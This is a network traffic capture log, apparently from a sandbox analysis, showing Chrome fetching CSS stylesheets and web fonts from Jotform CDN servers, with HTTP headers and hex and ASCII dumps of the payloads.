                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 65 64 69 74 61 62 6c 65 3e 64 69 76 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 61 67 2d 74 65 78 74 2d 63 6f 6c 6f 72 2d 2d 65 64 69 74 2c 23 30 30 30 29 7d 2e 74 61 67 69 66 79 5f 5f 74 61 67 2d 2d 65 64 69 74 61 62 6c 65 3e 64 69 76 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 32 70 78 20 23 64 33 65 32 65 32 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 32 70 78 20 76 61 72 28 2d 2d 74 61 67 2d 68 6f 76 65 72 2c 23 64 33 65 32 65 32 29 69 6e 73 65 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 67 69 66 79 5f 5f 74 61 67 2d 2d 65 64 69 74 61 62 6c 65 2e 74 61 67 69 66 79 2d 2d 69 6e 76 61 6c 69 64 3e 64 69 76 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e
                                                                                                                                                                                                                                            Data Ascii: editable>div{color:var(--tag-text-color--edit,#000)}.tagify__tag--editable>div:before{box-shadow:inset 0 0 0 2px #d3e2e2!important;box-shadow:0 0 0 2px var(--tag-hover,#d3e2e2)inset!important}.tagify__tag--editable.tagify--invalid>div:before{box-shadow:in
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 70 61 63 65 3a 70 72 65 2d 77 72 61 70 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 69 6e 70 75 74 2d 63 6f 6c 6f 72 2c 69 6e 68 65 72 69 74 29 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 72 67 69 6e 3a 35 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 74 61 67 69 66 79 5f 5f 69 6e 70 75 74 3a 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 31 3b 77 69 64 74 68 3a 61 75 74 6f 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 2d 6f 75 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 74 61 67 69 66 79 2d 2d 6d 69 78 20 2e
                                                                                                                                                                                                                                            Data Ascii: pace:pre-wrap;color:var(--input-color,inherit);box-sizing:inherit;flex-grow:1;margin:5px;display:inline-block;position:relative}.tagify__input:empty:before{opacity:1;width:auto;transition:all .2s ease-out;display:inline-block;transform:none}.tagify--mix .
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 61 67 69 66 79 5f 5f 69 6e 70 75 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2e 74 61 67 69 66 79 2d 2d 6d 69 78 20 2e 74 61 67 69 66 79 5f 5f 69 6e 70 75 74 3a 62 65 66 6f 72 65 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 74 61 67 69 66 79 2d 2d 6d 69 78 20 2e 74 61 67 69 66 79 5f 5f 69 6e 70 75 74 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 6e 6f 6e 65 7d 2e 74 61 67 69 66 79 2d 2d 73 65 6c 65 63 74 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 3e 22 3b 6f 70 61 63 69 74 79 3a 2e 35 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 38 70 78 3b 66 6f 6e 74 3a 31 36 70 78 2f 38 70
                                                                                                                                                                                                                                            Data Ascii: agify__input{width:100%;height:100%;margin:0;padding:5px;line-height:1.5}.tagify--mix .tagify__input:before{height:auto}.tagify--mix .tagify__input:after{content:none}.tagify--select:after{content:">";opacity:.5;pointer-events:none;height:8px;font:16px/8p
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 69 67 68 74 3a 33 30 30 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 31 2c 2e 35 2c 31 29 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 2d 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 74 61 67 69 66 79 5f 5f 64 72 6f 70 64 6f 77 6e 5f 5f 77 72 61 70 70 65 72 3a 68 6f 76 65 72 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 2e 74 61 67 69 66 79 5f 5f 64 72 6f 70 64 6f 77 6e 2d 2d 69 6e 69 74 69 61 6c 20 2e 74 61 67 69 66 79 5f 5f 64 72 6f 70 64 6f 77 6e 5f 5f 77 72 61 70 70 65 72 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 65 6d 29 7d
                                                                                                                                                                                                                                            Data Ascii: ight:300px;transition:all .25s cubic-bezier(0,1,.5,1);overflow:hidden;box-shadow:0 2px 4px -2px rgba(0,0,0,.2)}.tagify__dropdown__wrapper:hover{overflow:auto}.tagify__dropdown--initial .tagify__dropdown__wrapper{max-height:20px;transform:translateY(-1em)}
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 7b 73 74 72 6f 6b 65 3a 23 66 66 66 7d 2e 43 69 72 63 75 6c 61 72 50 72 6f 67 72 65 73 73 62 61 72 2e 43 69 72 63 75 6c 61 72 50 72 6f 67 72 65 73 73 62 61 72 2d 69 6e 76 65 72 74 65 64 20 2e 43 69 72 63 75 6c 61 72 50 72 6f 67 72 65 73 73 62 61 72 2d 74 72 61 69 6c 7b 73 74 72 6f 6b 65 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 77 69 70 65 72 2d 69 63 6f 6e 73 3b 73 72 63 3a 75 72 6c 28 22 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 66 6f 6e 74 2d 77 6f 66 66 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 20 64 30 39 47 52 67 41 42 41 41 41 41 41 41 5a 67 41 42 41 41 41 41 41 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                            Data Ascii: {stroke:#fff}.CircularProgressbar.CircularProgressbar-inverted .CircularProgressbar-trail{stroke:transparent}@font-face{font-family:swiper-icons;src:url("data:application/font-woff;charset=utf-8;base64, d09GRgABAAAAAAZgABAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 44 67 67 69 55 49 55 4c 43 75 45 4a 4b 38 56 68 4f 34 62 53 76 70 64 6e 6b 74 48 49 35 51 43 59 74 64 69 32 73 6c 38 5a 6e 58 61 48 6c 71 55 72 4e 4b 7a 64 4b 63 54 38 63 6a 6c 71 2b 72 77 5a 53 76 49 56 63 7a 4e 69 65 7a 73 66 6e 50 2f 75 7a 6e 6d 66 50 46 42 4e 4f 44 4d 32 4b 37 4d 54 51 34 35 59 45 41 5a 71 47 50 38 31 41 6d 47 47 63 46 33 69 50 71 4f 6f 70 30 72 31 53 50 54 61 54 62 56 6b 66 55 65 34 48 58 6a 39 37 77 59 45 2b 79 4e 77 57 59 78 77 57 75 34 76 31 75 67 57 48 67 6f 33 53 31 58 64 5a 45 56 71 57 4d 37 45 54 30 63 66 6e 4c 47 78 57 66 6b 67 52 34 32 6f 32 50 76 57 72 44 4d 42 53 46 6a 2f 49 48 4c 61 46 30 7a 4b 6a 52 67 64 69 56 4d 77 53 63 4e 52 41 6f 57 55 6f 48 37 38 59 32 69 63 42 2f 79 49 59 30 39 41 6e 36 41 48 32 42 64 75 2f 55 42
                                                                                                                                                                                                                                            Data Ascii: DggiUIULCuEJK8VhO4bSvpdnktHI5QCYtdi2sl8ZnXaHlqUrNKzdKcT8cjlq+rwZSvIVczNiezsfnP/uznmfPFBNODM2K7MTQ45YEAZqGP81AmGGcF3iPqOop0r1SPTaTbVkfUe4HXj97wYE+yNwWYxwWu4v1ugWHgo3S1XdZEVqWM7ET0cfnLGxWfkgR42o2PvWrDMBSFj/IHLaF0zKjRgdiVMwScNRAoWUoH78Y2icB/yIY09An6AH2Bdu/UB


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.1749709172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC559OUTGET /fonts/?family=Circular:400:500:700 HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 285
                                                                                                                                                                                                                                            Last-Modified: Fri, 10 Jan 2025 12:31:10 GMT
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b26838ef9d-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC957INData Raw: 34 35 63 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 69 72 63 75 6c 61 72 22 3b 0a 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 63 69 72 63 75 6c 61 72 2f 66 6f 6e 74 73 2f 43 69 72 63 75 6c 61 72 2d 42 6f 6f 6b 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 63 69 72 63 75 6c 61 72 2f 66 6f 6e 74 73 2f 43 69 72 63 75 6c 61 72 2d 42 6f 6f 6b 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 0a 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72
                                                                                                                                                                                                                                            Data Ascii: 45c@font-face { font-family: "Circular"; src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff) format("woff"); font-display: swap; font-style: nor
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC166INData Raw: 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 63 69 72 63 75 6c 61 72 2f 66 6f 6e 74 73 2f 43 69 72 63 75 6c 61 72 2d 42 6f 6c 64 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 0a 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff) format("woff"); font-display: swap; font-style: normal; font-weight: 700;}
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.1749711172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC577OUTGET /s/portal/674ac14411e/static/css/index.5048e680.css HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn02.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC422INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 444513
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:15 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "7699bc9a56265f4d22141f4c413b8486"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 258
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b28f9d431b-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC947INData Raw: 2e 6a 66 45 72 72 6f 72 50 61 67 65 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 6a 66 45 72 72 6f 72 50 61 67 65 2d 77 72 61 70 70 65 72 7b 7a 2d 69 6e 64 65 78 3a 31 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6a 66 45 72 72 6f 72 50 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 38 30 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 6a 66 45 72 72 6f 72 50 61 67
                                                                                                                                                                                                                                            Data Ascii: .jfErrorPage{height:100%}.jfErrorPage-wrapper{z-index:100;background-color:#f5f5f5;width:100%;height:100%;position:absolute}.jfErrorPage-container{justify-content:center;align-items:center;width:100%;min-height:100%;padding:80px 0;display:flex}.jfErrorPag
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 39 66 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 36 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 69 6d 61 67 65 2d 65 6d 70 74 79 2d 73 74 61 74 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 70 78 7d 2e 69 6d 61 67 65 2d 65 6d 70 74 79 2d 73 74 61 74 65 20 73 76 67 7b 6f 70 61 63 69 74 79 3a 2e 38 3b 63 6f 6c 6f 72 3a 23 36 66 37 36 61 37 3b 77 69 64 74 68 3a 38 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b
                                                                                                                                                                                                                                            Data Ascii: #fff;background-color:#09f;border:none;border-radius:4px;outline:none;margin-top:16px;padding:12px 65px;font-size:20px;line-height:32px}.image-empty-state{width:100%;min-width:120px}.image-empty-state svg{opacity:.8;color:#6f76a7;width:80px;margin:0 auto;
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 7d 2e 69 73 4c 69 67 68 74 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 4d 65 6e 75 2d 69 6e 6e 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 32 63 33 33 34 35 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 20 23 66 61 66 61 66 63 7d 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 4d 65 6e 75 2d 69 6e 6e 65 72 2d 6c 69 6e 6b 2e 69 73 2d 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 20 23 32 38 39 66 66 30 7d 2e 69 73 44 61 72 6b 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 4d 65 6e 75 2d 69 6e 6e 65 72 2d 6c 69 6e 6b 2e 69 73 2d 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 20 23 34 35 37 33 65 33 7d 2e 69 73 4c 69 67 68 74 2e 69
                                                                                                                                                                                                                                            Data Ascii: }.isLight.imageUpload .tabMenu-inner-link{color:#2c3345;border-bottom:4px solid #fafafc}.imageUpload .tabMenu-inner-link.is-active{border-bottom:4px solid #289ff0}.isDark.imageUpload .tabMenu-inner-link.is-active{border-bottom:4px solid #4573e3}.isLight.i
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20
                                                                                                                                                                                                                                            Data Ascii: :none;user-select:none;border:none;border-radius:4px;flex-direction:column;justify-content:center;align-items:center;width:100%;height:100%;margin-bottom:4px;padding:15px;font-size:15px;font-weight:400;line-height:14px;text-decoration:none;transition:all
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 61 64 66 66 7d 2e 62 72 61 6e 64 69 6e 67 32 31 2e 69 73 54 72 61 6e 73 70 61 72 65 6e 74 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 66 69 6c 65 55 70 6c 6f 61 64 2d 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 20 2e 66 69 6c 65 55 70 6c 6f 61 64 4c 61 62 65 6c 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 61 63 63 7d 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 66 69 6c 65 55 70 6c 6f 61 64 2d 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 20 2e 66 69 6c 65 55 70 6c 6f 61 64 4c 61 62 65 6c 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 65 62 38 7d 2e
                                                                                                                                                                                                                                            Data Ascii: over{background-color:#33adff}.branding21.isTransparent.imageUpload .tabContent .fileUpload-verticalAlign .fileUploadLabel:active{background-color:#007acc}.imageUpload .tabContent .fileUpload-verticalAlign .fileUploadLabel:hover{background-color:#367eb8}.
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 66 69 6c 65 55 70 6c 6f 61 64 2d 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 62 32 63 33 66 37 7d 2e 69 73 54 72 61 6e 73 70 61 72 65 6e 74 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 66 69 6c 65 55 70 6c 6f 61 64 2d 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 32 33 32 38 33 61 7d 2e 62 72 61 6e 64 69 6e 67 32 31 2e 69 73 54 72 61 6e 73 70 61 72 65 6e 74 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 66 69 6c 65 55 70 6c 6f 61 64 2d 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 61 31 35 35 31 7d 2e 69 6d 61 67 65
                                                                                                                                                                                                                                            Data Ascii: .imageUpload .tabContent .fileUpload-verticalAlign-text{color:#b2c3f7}.isTransparent.imageUpload .tabContent .fileUpload-verticalAlign-text{color:#23283a}.branding21.isTransparent.imageUpload .tabContent .fileUpload-verticalAlign-text{color:#0a1551}.image
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 38 70 78 7d 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 63 61 72 64 4e 65 77 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 34 63 34 64 36 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 30 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 34 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 63 61 72 64 4e 65 77 2d 6c 65 66 74 53 69 64 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 3a 31 3b 70 61 64 64 69 6e 67 3a 31 65 6d 20 2e 35 65 6d 7d 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 63 61 72 64 4e 65 77 2d 6c 65
                                                                                                                                                                                                                                            Data Ascii: osition:absolute;bottom:8px}.imageUpload .tabContent .cardNew{border:1px solid #c4c4d6;min-height:200px;max-height:324px;display:flex}.imageUpload .tabContent .cardNew-leftSide{text-align:center;flex:1;padding:1em .5em}.imageUpload .tabContent .cardNew-le
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 34 63 34 64 36 7d 2e 69 73 44 61 72 6b 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 70 72 65 76 55 70 6c 6f 61 64 73 2d 6c 69 73 74 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 69 73 54 72 61 6e 73 70 61 72 65 6e 74 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 70 72 65 76 55 70 6c 6f 61 64 73 2d 6c 69 73 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 62 72 61 6e 64 69 6e 67 32 31 2e 69 6d 61 67 65 55 70 6c 6f 61 64 20 2e 74 61 62 43 6f 6e 74 65 6e 74 20 2e 70 72 65 76 55 70 6c 6f 61 64 73 2d 6c 69 73 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                                                                                                                                                                                                                                            Data Ascii: r:#fff;border:1px solid #c4c4d6}.isDark.imageUpload .tabContent .prevUploads-list{box-shadow:none}.isTransparent.imageUpload .tabContent .prevUploads-list{background-color:transparent}.branding21.imageUpload .tabContent .prevUploads-list{background-color:
